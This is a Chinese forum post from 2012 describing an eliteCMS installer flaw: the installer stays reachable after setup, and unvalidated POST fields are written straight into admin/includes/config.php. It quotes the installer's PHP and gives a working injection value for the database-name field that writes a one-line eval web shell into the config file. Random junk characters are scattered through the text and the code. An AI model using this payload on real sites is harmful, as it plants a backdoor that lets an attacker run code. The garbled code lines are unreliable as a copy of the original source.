eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
9 l- T3 S6 z& `7 K' X5 M5 y7 H, [$ v: _. l g0 u _& A
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
! A4 {1 K* `" y5 M3 Y; v我们来看代码:
H3 s3 |/ M+ z7 b! ^! H! H ! Z9 A; R, {4 p- u+ n8 ?& O
...
! R7 z2 e2 F. E% b, Celseif ($_GET['step'] == "4") {
2 s& }( K% a6 o c $file = "../admin/includes/config.php";# _( Z& l2 D$ G6 B ?9 K$ U, x
$write = "<?php\n";0 v" n$ D! s& g# f6 l
$write .= "/**\n";0 k/ b) |$ }0 n6 `$ A4 S
$write .= "*\n";# N/ U. \+ K9 N$ Z
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
- j5 T$ q: E, k' H; X- q...略...
; p4 b" V' [& T+ ]! x+ H $write .= "*\n";
" o& U6 l7 Z6 B* _* h $write .= "*/\n";
4 C5 f2 a9 l4 T3 L $write .= "\n";
# i( U' n/ L$ L7 F7 R3 P" [( Y $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";) b/ C4 l. \4 C0 {7 {
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
8 ~, ^1 s- U! o/ M $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";! Q4 @& g. x2 Y9 T
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
; X1 W/ L4 q, o2 B- e+ L $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";9 C9 N/ O4 u+ g b: ~
$write .= "if (!\$connection) {\n";
/ K# g% c, s3 Y% a2 E3 ~$ |/ l' g $write .= " die(\"Database connection failed\" .mysql_error());\n";
* |/ _6 t% \2 P s% ?# ^* ] $write .= " \n";6 M8 A& ~2 e& \+ ?
$write .= "} \n";
9 H) b& [, J- {) h. \$ l6 ^0 R $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
( T" M+ j9 U+ f: G $write .= "if (!\$db_select) {\n";
) l" L/ ~: q/ ` $write .= " die(\"Database select failed\" .mysql_error());\n";
) b2 O' t6 Y2 I7 \/ y0 o $write .= " \n";
( T; [7 i. Q) Q3 R$ e" Y $write .= "} \n";' F4 h* J) A7 w% r
$write .= "?>\n";
9 E" }' G0 M! U4 w5 {$ E# o6 T
9 ~) i9 y$ [% s) H $writer = fopen($file, 'w');
* f0 O+ S* Y, `2 }& j...5 g. M. P( \" t( _& ?
" `" @) r! x% p' B4 i
在看代码:
% f. E; _" _8 J
0 V* B7 \$ @6 t5 L# Y$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];) B/ u/ q8 t* g
$_SESSION['DB_NAME'] = $_POST['DB_NAME']; l m, z4 s8 p
$_SESSION['DB_USER'] = $_POST['DB_USER'];& L5 \$ N% } f Q: g; D) S
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
+ q/ H ~4 ^; A# w6 d$ P% |( T% c
- Z* a! Z4 Y5 K) o- @取值未作任何验证
9 g& m0 G# U' K3 `; i如果将数据库名POST数据:5 {2 e" c ^# w# B- J# d, v
3 W2 @) h! C/ C) j% Z
"?><?php eval($_POST[c]);?><?php
" M* `2 l7 S N) `
: y) j, A4 r& P7 J& `, l将导致一句话后门写入/admin/includes/config.php$ z) n8 T' W% A l
|
发表于 2012-11-18 13:59:27
收藏
分享
支持
反对